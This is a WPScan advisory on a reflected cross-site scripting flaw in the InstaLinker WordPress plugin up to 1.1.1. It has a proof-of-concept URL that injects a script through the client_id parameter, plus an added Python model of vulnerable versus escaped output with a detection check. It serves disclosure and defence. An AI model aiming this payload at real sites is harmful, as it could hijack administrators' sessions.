InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)


Description
The includes/instalinker-admin-preview.php file reflects the client_id request parameter into its output without sanitisation or output encoding. As the proof of concept shows, the value lands inside a data-il-client-id attribute, so a crafted value can close that attribute and inject a script element. A user who follows an attacker-supplied link runs the script in their own browser; if that user is an authenticated WordPress administrator, the script can act with their privileges and potentially compromise the WordPress installation.
Proof of Concept
http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cdiv%20data-il-client-id=%22

URL-decoded, the client_id value is "><script>alert(1);</script><div data-il-client-id=" : the leading "> closes the attribute and its tag, the script element follows, and the trailing <div data-il-client-id=" absorbs the closing quote the page emits after the reflected value, so the surrounding markup stays well formed.
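The reflection described above, modelled as an added Python example (this is not the plugin's code nor the advisory author's): the template markup in render_vulnerable() is an assumption inferred from the PoC URL, html.escape() stands in for WordPress's esc_attr() as the attribute-context fix, and audit() is the check to run against a response from a patched site.

```python
"""Model of the InstaLinker client_id reflection (added example, not plugin code).

Assumptions: the page emits the request value inside a data-il-client-id
attribute (inferred from the PoC URL); html.escape(quote=True) is used as a
stand-in for WordPress's esc_attr(), which encodes the same characters.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

VULN_PATH = "/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php"

# The advisory's PoC value for client_id, URL-decoded.
POC_PAYLOAD = unquote("%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cdiv%20data-il-client-id=%22")


def build_poc_url(base_url: str, client_id: str = POC_PAYLOAD) -> str:
    """Rebuild the PoC URL for a target, e.g. base_url='http://www.example.com'."""
    return f"{base_url.rstrip('/')}{VULN_PATH}?client_id={quote(client_id, safe='')}"


def render_vulnerable(client_id: str) -> str:
    """Hypothetical stand-in for the unsanitised reflection: the raw request
    value is concatenated into an attribute, so a double quote ends the value."""
    return f'<div data-il-client-id="{client_id}"></div>'


def render_fixed(client_id: str) -> str:
    """Attribute-context output encoding: quotes and angle brackets become
    entities, so the browser treats the whole value as attribute data."""
    return f'<div data-il-client-id="{html.escape(client_id, quote=True)}"></div>'


class _MarkupAudit(HTMLParser):
    """Counts real <script> elements and collects data-il-client-id values
    as a browser would parse them (character references decoded)."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.client_ids = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, value in attrs:
            if name == "data-il-client-id":
                self.client_ids.append(value or "")


def audit(body: str) -> tuple:
    """Return (number of script elements, parsed data-il-client-id values)."""
    parser = _MarkupAudit()
    parser.feed(body)
    parser.close()
    return parser.script_tags, parser.client_ids


def reflection_is_exploitable(body: str, baseline_scripts: int = 0) -> bool:
    """True when the response contains more script elements than a request
    with a benign client_id produced, i.e. the reflected value escaped the
    attribute context. Against a live page, first fetch it with a harmless
    value and pass that script count as baseline_scripts."""
    return audit(body)[0] > baseline_scripts


if __name__ == "__main__":
    print(build_poc_url("http://www.example.com"))
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render(POC_PAYLOAD)
        print(f"{label}: {page}")
        print(f"  exploitable={reflection_is_exploitable(page)} audit={audit(page)}")
```

In the fixed rendering the parser returns the payload intact as the attribute's value and finds no script element; in the vulnerable rendering the attribute is cut to an empty string and a real script element appears. Encoding at the output point is the minimum fix; whether the preview file also needs a capability or nonce check is not something this advisory states.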

Affects

Plugin instalinker
fixed in version 1.1.2

References

URL http://blog.rastating.com/instalinker-reflected-xss-information-disclosure/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Views 166
Verified No
WPVDB ID 8382

Timeline

Publicly Published 2016-02-07
Added 2016-02-07
Last Updated 2016-02-08

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.